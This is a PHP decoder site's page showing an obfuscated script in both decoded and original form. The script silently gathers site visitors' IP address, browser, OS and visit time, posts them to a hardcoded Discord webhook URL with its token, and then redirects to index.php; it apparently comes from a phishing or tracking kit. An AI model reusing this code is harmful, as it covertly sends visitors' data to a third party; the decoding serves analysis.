Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Uhogm; nhpaH: if ($ip == "\61\x32\x37\56\x30\x2e\x30\x2e\61") { $ip = ''; } g..

Decoded Output download

<?php 
 goto Uhogm; nhpaH: if ($ip == "127.0.0.1") { $ip = ''; } goto pRNYW; tEhIE: $curl = curl_init($url); goto gH7Sb; HqX9p: $data = "content=```{$visit}```"; goto HXlvB; v3lOJ: function getOS() { $user_agent = $_SERVER["HTTP_USER_AGENT"]; $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto N_96q; ufS6o: $ip = getUserIP(); goto nhpaH; Ivq0f: function getBrowser() { $user_agent = $_SERVER["HTTP_USER_AGENT"]; $browser = "Unknown Browser"; $browser_array = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/opera/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/mobile/i" => "Handheld Browser"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto WIwdC; wQzTn: $domain = preg_replace("/www\./i", '', $_SERVER["SERVER_NAME"]); goto Vp_Rx; WIwdC: $browser = getBrowser(); goto CeKFl; O4FeN: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto HqX9p; KqDmI: curl_close($curl); goto mRWn2; CeKFl: $date = date("d M, Y"); goto OsYH7; BYk7y: $headers = array("Content-Type: application/x-www-form-urlencoded"); goto O4FeN; HXlvB: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto H5K8_; TFJXh: $visit = "
IP: {$ip}\xaBROWSER: {$browser}\xaDEVICE: {$os}\xaDATE: {$date}"; goto SdGdQ; H5K8_: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto WZnHl; gH7Sb: curl_setopt($curl, CURLOPT_URL, $url); goto OWrFs; WZnHl: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto xm7YY; N_96q: $os = getOS(); goto Ivq0f; OsYH7: $time = date("g:i a"); goto rAsSD; rAsSD: $date = trim($date . ", Time : " . $time); goto vAZy2; SdGdQ: $url = "https://discord.com/api/webhooks/1117894022044860537/OnSoX9XmtH5JHfuI24CeXntTaje2sbjHZyBex8Wov_ZGxUfkGHnuCLMSNBdgpuwIKADS"; goto tEhIE; xm7YY: $resp = curl_exec($curl); goto KqDmI; Vp_Rx: function getUserIP() { $client = @$_SERVER["HTTP_CLIENT_IP"]; $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"]; $remote = $_SERVER["REMOTE_ADDR"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto x4B4F; vAZy2: $key = sha1(base64_encode($ip2 . $user_agent)); goto TFJXh; mRWn2: header("Location: index.php"); goto k5248; OWrFs: curl_setopt($curl, CURLOPT_POST, true); goto H3HFY; pRNYW: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto v3lOJ; x4B4F: function create_file($name, $isi) { $click = fopen("{$name}", "a"); fwrite($click, "{$isi}" . "\xa"); fclose($click); } goto ufS6o; H3HFY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto BYk7y; Uhogm: date_default_timezone_set("Asia/Manila"); goto wQzTn; k5248: ?>

Did this file decode correctly?

Original Code

<?php
 goto Uhogm; nhpaH: if ($ip == "\61\x32\x37\56\x30\x2e\x30\x2e\61") { $ip = ''; } goto pRNYW; tEhIE: $curl = curl_init($url); goto gH7Sb; HqX9p: $data = "\x63\157\x6e\164\145\x6e\164\75\140\140\140{$visit}\x60\140\x60"; goto HXlvB; v3lOJ: function getOS() { $user_agent = $_SERVER["\110\124\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\105\x4e\124"]; $os_platform = "\x55\156\153\x6e\x6f\167\x6e\40\117\123\40\120\154\x61\164\146\157\162\155"; $os_array = array("\57\x77\151\156\x64\157\x77\163\x20\x6e\x74\40\x31\60\x2f\151" => "\127\x69\156\x64\x6f\x77\163\x20\61\60", "\x2f\167\151\156\x64\x6f\167\x73\40\x6e\x74\x20\66\56\63\57\x69" => "\127\151\x6e\144\x6f\167\x73\x20\x38\x2e\61", "\57\x77\151\x6e\x64\157\167\163\x20\156\x74\x20\x36\x2e\62\57\151" => "\127\x69\156\x64\x6f\x77\x73\40\70", "\x2f\167\x69\156\144\157\167\x73\40\x6e\x74\40\66\56\x31\x2f\x69" => "\x57\151\x6e\x64\157\x77\x73\40\x37", "\x2f\x77\x69\156\144\x6f\167\x73\x20\x6e\164\40\66\x2e\60\57\151" => "\x57\x69\156\144\157\167\x73\x20\x56\151\163\164\141", "\57\x77\151\156\144\x6f\x77\163\40\156\164\x20\x35\56\62\x2f\151" => "\127\x69\156\x64\157\167\x73\40\123\145\x72\x76\x65\162\x20\62\60\x30\63\x2f\x58\x50\40\170\x36\64", "\57\167\x69\x6e\144\157\x77\163\40\156\x74\x20\x35\56\x31\57\151" => "\x57\x69\156\x64\x6f\167\163\40\x58\x50", "\x2f\x77\151\x6e\144\157\x77\163\40\170\x70\x2f\x69" => "\127\151\x6e\x64\x6f\167\x73\x20\x58\x50", "\x2f\x77\x69\156\144\x6f\x77\x73\40\156\x74\x20\65\x2e\x30\57\151" => "\x57\x69\156\x64\x6f\167\x73\40\x32\x30\x30\60", "\x2f\167\x69\x6e\x64\x6f\x77\x73\x20\x6d\x65\57\151" => "\127\x69\156\144\x6f\167\x73\40\x4d\x45", "\57\167\x69\x6e\71\70\57\x69" => "\127\151\x6e\x64\157\x77\x73\x20\71\70", "\x2f\x77\151\x6e\71\65\57\x69" => "\127\x69\x6e\144\157\x77\x73\40\x39\65", "\57\167\x69\156\61\66\57\x69" => "\x57\151\x6e\144\157\x77\x73\40\x33\56\x31\61", "\x2f\155\x61\143\151\x6e\x74\157\163\150\x7c\x6d\x61\143\x20\x6f\163\x20\170\57\151" => "\x4d\x61\143\40\x4f\123\40\x58", "\57\155\141\x63\x5f\x70\157\167\145\x72\160\143\x2f\151" => "\115\x61\x63\x20\x4f\x53\x20\x39", "\x2f\x6c\151\156\165\170\x2f\151" => "\x4c\151\x6e\165\x78", "\57\x75\x62\165\156\x74\x75\57\x69" => "\x55\142\165\x6e\x74\165", "\x2f\151\160\x68\x6f\156\x65\57\x69" => "\x69\x50\150\x6f\x6e\x65", "\x2f\151\x70\x6f\x64\x2f\x69" => "\x69\120\x6f\144", "\x2f\151\x70\x61\x64\x2f\x69" => "\151\120\141\x64", "\x2f\141\x6e\x64\162\x6f\x69\144\x2f\x69" => "\x41\x6e\x64\162\157\x69\x64", "\x2f\142\154\x61\x63\153\142\145\162\162\171\57\x69" => "\102\154\x61\143\153\x42\145\162\162\x79", "\57\x77\x65\x62\x6f\x73\x2f\x69" => "\x4d\157\x62\x69\x6c\x65"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto N_96q; ufS6o: $ip = getUserIP(); goto nhpaH; Ivq0f: function getBrowser() { $user_agent = $_SERVER["\x48\x54\124\x50\137\x55\x53\x45\x52\137\101\x47\x45\116\x54"]; $browser = "\125\x6e\153\x6e\x6f\x77\156\x20\x42\162\157\x77\163\x65\x72"; $browser_array = array("\x2f\155\163\x69\x65\57\151" => "\111\x6e\x74\145\x72\156\x65\x74\x20\105\x78\x70\154\157\162\x65\x72", "\x2f\x66\x69\162\x65\x66\157\x78\x2f\151" => "\x46\x69\162\145\146\157\170", "\57\163\141\146\x61\x72\x69\x2f\x69" => "\123\x61\146\x61\162\151", "\x2f\x63\x68\162\x6f\x6d\x65\57\x69" => "\x43\150\162\x6f\155\x65", "\57\157\x70\145\162\141\57\x69" => "\x4f\x70\x65\162\x61", "\x2f\156\x65\x74\163\x63\141\160\145\x2f\x69" => "\116\145\164\x73\x63\141\x70\145", "\57\x6d\141\170\164\x68\157\x6e\x2f\x69" => "\x4d\x61\x78\164\x68\x6f\x6e", "\57\x6b\x6f\x6e\161\165\x65\162\x6f\x72\x2f\151" => "\x4b\x6f\x6e\161\x75\145\x72\157\162", "\x2f\155\x6f\142\x69\x6c\145\57\x69" => "\x48\x61\156\144\x68\145\x6c\x64\x20\102\162\x6f\167\x73\145\162"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto WIwdC; wQzTn: $domain = preg_replace("\x2f\167\167\167\x5c\x2e\x2f\x69", '', $_SERVER["\x53\105\122\126\105\122\x5f\116\101\115\105"]); goto Vp_Rx; WIwdC: $browser = getBrowser(); goto CeKFl; O4FeN: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto HqX9p; KqDmI: curl_close($curl); goto mRWn2; CeKFl: $date = date("\144\x20\x4d\54\x20\131"); goto OsYH7; BYk7y: $headers = array("\x43\157\156\164\x65\156\x74\55\124\171\160\145\x3a\x20\141\160\160\154\x69\x63\x61\164\151\157\156\57\x78\x2d\167\x77\167\x2d\x66\157\162\155\55\x75\x72\x6c\145\x6e\143\x6f\144\145\144"); goto O4FeN; HXlvB: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto H5K8_; TFJXh: $visit = "\12\111\120\72\x20{$ip}\xa\x42\x52\117\127\123\105\122\x3a\40{$browser}\xa\104\x45\126\111\x43\x45\x3a\x20{$os}\xa\x44\101\124\x45\72\40{$date}"; goto SdGdQ; H5K8_: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto WZnHl; gH7Sb: curl_setopt($curl, CURLOPT_URL, $url); goto OWrFs; WZnHl: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto xm7YY; N_96q: $os = getOS(); goto Ivq0f; OsYH7: $time = date("\147\x3a\151\40\141"); goto rAsSD; rAsSD: $date = trim($date . "\54\40\x54\151\x6d\145\40\72\40" . $time); goto vAZy2; SdGdQ: $url = "\x68\164\164\160\163\x3a\x2f\x2f\x64\x69\163\x63\x6f\162\144\x2e\143\x6f\155\x2f\141\160\x69\57\167\145\x62\x68\157\157\x6b\x73\x2f\61\61\x31\67\70\71\x34\x30\x32\62\x30\x34\x34\70\66\60\65\63\x37\57\x4f\x6e\x53\157\130\x39\130\155\164\x48\65\112\110\x66\x75\x49\x32\x34\x43\145\130\156\x74\124\141\152\145\62\163\142\x6a\x48\x5a\x79\102\145\x78\70\x57\x6f\x76\137\132\x47\x78\125\x66\153\x47\110\156\165\x43\x4c\115\x53\x4e\102\144\147\160\165\x77\111\x4b\101\104\123"; goto tEhIE; xm7YY: $resp = curl_exec($curl); goto KqDmI; Vp_Rx: function getUserIP() { $client = @$_SERVER["\110\x54\x54\x50\137\x43\114\x49\x45\116\x54\x5f\111\x50"]; $forward = @$_SERVER["\x48\124\124\120\x5f\130\x5f\106\x4f\122\127\x41\x52\x44\x45\104\x5f\x46\117\x52"]; $remote = $_SERVER["\122\x45\x4d\117\x54\105\137\101\x44\104\122"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto x4B4F; vAZy2: $key = sha1(base64_encode($ip2 . $user_agent)); goto TFJXh; mRWn2: header("\114\x6f\143\x61\164\151\x6f\156\72\40\x69\x6e\x64\145\x78\x2e\160\x68\160"); goto k5248; OWrFs: curl_setopt($curl, CURLOPT_POST, true); goto H3HFY; pRNYW: $user_agent = $_SERVER["\x48\124\124\120\137\125\123\x45\122\137\101\x47\105\x4e\124"]; goto v3lOJ; x4B4F: function create_file($name, $isi) { $click = fopen("{$name}", "\141"); fwrite($click, "{$isi}" . "\xa"); fclose($click); } goto ufS6o; H3HFY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto BYk7y; Uhogm: date_default_timezone_set("\101\163\151\141\x2f\x4d\141\156\x69\154\x61"); goto wQzTn; k5248: ?>

Function Calls

None

Variables

None

Stats

MD5 f394438ed1c98e2411062fb40606cdf7
Eval Count 0
Decode Time 47 ms